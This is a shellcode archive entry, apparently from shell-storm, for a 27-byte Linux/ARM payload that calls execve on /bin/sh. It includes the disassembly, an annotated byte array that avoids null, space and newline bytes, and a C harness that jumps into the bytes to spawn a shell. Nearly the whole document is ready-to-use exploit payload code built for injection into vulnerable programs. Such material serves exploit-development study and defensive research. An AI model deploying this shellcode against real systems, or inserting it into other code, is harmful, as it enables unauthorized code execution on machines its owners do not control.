
# Title : Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
# Published : 2010-09-05
# Author :


/*
Title:     Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
Date:      2010-08-31
Tested on: ARM926EJ-S rev 5 (v5l)
Author:    Jonathan Salwan - twitter: @jonathansalwan

shell-storm.org

ARM shellcode that contains no 0x20, 0x0a or 0x00 bytes


Disassembly of section .text:

00008054 <_start>:
    8054:	e28f3001 	add	r3, pc, #1	; 0x1
    8058:	e12fff13 	bx	r3
    805c:	4678      	mov	r0, pc
    805e:	3008      	adds	r0, #8
    8060:	1a49      	subs	r1, r1, r1
    8062:	1a92      	subs	r2, r2, r2
    8064:	270b      	movs	r7, #11
    8066:	df01      	svc	1
    8068:	622f      	str	r7, [r5, #32]
    806a:	6e69      	ldr	r1, [r5, #100]
    806c:	732f      	strb	r7, [r5, #12]
    806e:	0068      	lsls	r0, r5, #1

*/

#include <stdio.h>
#include <string.h>



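/*
 * Payload bytes, in memory order, matching the disassembly in the header
 * comment (each instruction word there is shown as a value, so its bytes
 * appear here little-endian).
 *
 * The hex escapes need their leading backslash: without it the literal is
 * the ASCII text "x01x30...", which is 81 characters rather than the 27
 * bytes the title states.
 *
 * Per the header, the 27 explicit bytes avoid 0x00, 0x20 and 0x0a.  The
 * NUL that ends "/bin/sh" (the 0x00 in the last halfword at 806e) is not
 * written out; it is the implicit terminator of the C string literal, so
 * sizeof SC is 28 and strlen(SC) is 27.
 */
char SC[] = "\x01\x30\x8f\xe2"   /* 8054: add  r3, pc, #1                   */
            "\x13\xff\x2f\xe1"   /* 8058: bx   r3  (odd target: Thumb code) */
            "\x78\x46\x08\x30"   /* 805c: mov  r0, pc ; adds r0, #8         */
            "\x49\x1a\x92\x1a"   /* 8060: subs r1, r1, r1 ; subs r2, r2, r2 */
            "\x0b\x27\x01\xdf"   /* 8064: movs r7, #11 ; svc 1              */
            "\x2f\x62\x69\x6e"   /* 8068: "/bin" - data, which the listing  */
            "\x2f\x73\x68";      /* 806c: "/sh"    decodes as instructions  */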


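/*
 * Test harness: report the payload length, then call SC as if it were a
 * function.
 *
 * Returns 0 only if the call into SC comes back to the caller.
 */
int main(void)
{
        /* strlen() returns size_t, so the matching conversion is %zu. */
        fprintf(stdout, "Length: %zu\n", strlen(SC));

        /*
         * Flush before the jump: if the payload replaces the process image,
         * anything still sitting in the stdio buffer is never written.
         */
        fflush(stdout);

        /*
         * SC is a non-const file-scope array, so it is normally placed in a
         * writable data section.  Where data pages are mapped non-executable
         * (NX / W^X), this call faults instead of running the bytes.
         */
        (*(void(*)()) SC)();
        return 0;
}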